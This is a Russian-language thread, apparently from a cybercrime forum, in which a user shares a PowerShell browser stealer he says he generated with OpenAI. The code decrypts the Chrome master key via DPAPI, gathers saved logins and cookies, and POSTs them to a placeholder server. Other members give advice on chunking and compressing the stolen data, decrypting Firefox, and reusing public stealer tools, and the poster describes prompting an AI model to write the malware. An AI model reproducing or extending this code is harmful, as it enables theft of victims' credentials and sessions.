• XSS.stack #1 – первый литературный журнал от юзеров форума

Стиллер на Open AI

ch38urek

RAID-массив
Пользователь
Регистрация
09.12.2022
Сообщения
54
Реакции
56
Привет, поцаны некоторое время назад я начал эксперементировать с OpenAI и результат получился, пока
не буду делать [Статью] с опубликованием полностью того каким образом я делал это дело, просто нужны советы,
возможно в данный момент я делаю что то не так, но ход моих мыслей примерно такой:

photo_2023-01-09_12-42-34.jpg


Впринципе код стиллера на данный момент написан на Powershell, и думаю не имеет проблем в портировании
на другие языки, а если и имеет то будет очень легким.

Python:
$appDataPath = $env:appdata
$localAppDataPath = $env:localappdata

$mainresult = @()

Get-ChildItem -Path $appDataPath, $localAppDataPath -Recurse -Filter "Local State" -File | ForEach-Object {

    $result = @()

    $contentLocalState = Get-Content -Raw -Path $_.FullName | ConvertFrom-Json
    $encryptedKey = [System.Convert]::FromBase64String($contentLocalState.os_crypt.encrypted_key)
    $encryptedKey = $encryptedKey[5..$encryptedKey.Length];
    $masterKey = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedKey, $null, "CurrentUser")
    $masterKey64 = [System.Convert]::ToBase64String($masterKey)

    $logdb = @()
    $cocdb = @()

    Get-ChildItem -Path $_.Directory -Recurse -Filter "Login Data" -File | ForEach-Object {
        $contentDb = Get-Content -Path $_.FullName
        $logdb += $contentDb
    }

    Get-ChildItem -Path $_.Directory -Recurse -Filter "Cookies" -File | ForEach-Object {
        $contentDb = Get-Content -Path $_.FullName
        $cocdb += $contentDb
    }   

    $result += @{ MasterKey = $masterKey64; LoginDatas = $logdb; Cookies = $cocdb }
    $mainresult += $result
}

$json = $mainresult | ConvertTo-Json

$response = Invoke-WebRequest -Method POST -Uri "https://example.com/api/endpoint" -Body $json -ContentType "application/json"

Я не собираюсь это каким либо образом торговать и что то подобное, просто интересно, в чем логика моя не такая,
ведь по сути я расшифровал мастер ключ и отправлю с базами данных его в панель, что бы в панели до-расшифровывать

Я знаю что в можно сразу в пауршелле с помощью DLL под NET сразу расшифровать, но смысл?
Есть ли еще какие файлы которые стоит утягивать с PC???
Че еще делать, как расшифровывается Firefox?

Понабросайте идей, впринципе разработка будет открытой
 
Вопросы к сообществу:
1) На каком ЯП лучше сделать Админку что бы расшифровывать пассы из бд?
- Python - так как дохера исходников на гитхабе, с расшифровкой браузеров различных
Но можно использовать например Java? Кто то поможет сделать тоже самое мне?
2) Какие библиотеки к предложенному языку вы рекомендуете для расшифровки?
3) Что еще можно тырить с компьютера что бы добавить в стиллер?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
в чем логика моя не такая
По-умолчанию во всех фреймворках так или иначе есть ограничения на размер тела POST-запроса, в PHP это по-моему 8мб. Можно либо на сервере настроить большое ограничение, либо в клиенте и сервере сделать разбиение большого объема на части, что предпочтительней в теории (на практике же ты вряд ли стиллером будешь выкачивать такой большой объем данных, чтобы соединение рвалось).
 
стиллером будешь выкачивать такой большой объем данных
В коде я сохраняю raw баз данных в json, запустив на своём пэкэ стиллак я получаю json размером 9МБ - да уже как то стремненько, однако:
либо в клиенте и сервере сделать разбиение большого объема на части
Спасибо большое за твой совет я им реально воспользуюсь
 
Полезные ссылки:
https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/38575/
https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/69584/

Думаю закроют большую часть вопросов.
Спасибо большое, если можешь то поделись пожалуйста хайдом из сообщения https://xss.pro/threads/38575/post-251074 автор там уже не появится судя по всему, так как у него бан, буду изучать декрипт лисицы
 
Спасибо большое, если можешь то поделись пожалуйста хайдом из сообщения https://xss.pro/threads/38575/post-251074 автор там уже не появится судя по всему, так как у него бан, буду изучать декрипт лисицы
Чекни на гитхабе, на питоне много кода для дешифровки и лиссы и хрома.
"browser-thief", "firefox-stealer" и тд.
 
Чекни на гитхабе, на питоне много кода для дешифровки и лиссы и хрома
Спасибо!
 
В коде я сохраняю raw баз данных в json, запустив на своём пэкэ стиллак я получаю json размером 9МБ
Используй какой-либо алгоритм сжатия. Так же не забывай что старые версии хрома шифруют данные с помощью DPAPI.
 
Если вы хотите обойтись только firefox, то проще всего получить данные из sqlite базы данных, интегрированной в каждую систему, в противном случае для chrome это DPAPI.
 
Если вы хотите обойтись только firefox, то проще всего получить данные из sqlite базы данных
вопрос состоял в том, как эти данные расшифровать

на форуме есть кучу обсуждений по этому поводу и методам как это можно сделать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да полную хуету он генерирует нерабочую
Фиксить после этого говнобота уйдет в 5 раз больше времени чем с нуля писать
 
Да полную хуету он генерирует нерабочую
Фиксить после этого говнобота уйдет в 5 раз больше времени чем с нуля писать
Цель будущей статьи рассказать как научиться писать код с помощью модели, а не то как он будет думать за тебя. Тут смысл в весах, как давать ей запрос, как давать ей негативные запросы, как их уточнять.
 
на форуме есть кучу обсуждений по этому поводу и методам как это можно сделать
Правильно. Ведь я не знаю лично как расшифровывать firefox, дело в том, что именно мои запросы будут влиять как модель будет создавать код, мне самому лично нужно понимать как оно будет работать и как оно работает в реальном мире на практике, что бы дать основные ключевые моменты ИИ, что бы он сгенерил всё ;)
 
то проще всего получить данные из sqlite базы данных
Я проанализировал разные варианты и пришел к мнению (субъективному) то что буду отсылать эти БД так же в панель, и в панели рассшифровывать бд так же как и хром БД
 
Правильно. Ведь я не знаю лично как расшифровывать firefox, дело в том, что именно мои запросы будут влиять как модель будет создавать код, мне самому лично нужно понимать как оно будет работать и как оно работает в реальном мире на практике, что бы дать основные ключевые моменты ИИ, что бы он сгенерил всё ;)
На гитхабе поищи, есть методы с декодом через загрузку профиля фф, или динамически декодишь asn1 (реализация на питоне есть в LaZagne, также на гх)
 
декодом через загрузку профиля фф
спасибо, мэн. но уже все я разобрался :) осталось дождаться когда open ai расступит, что бы через него сделать
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх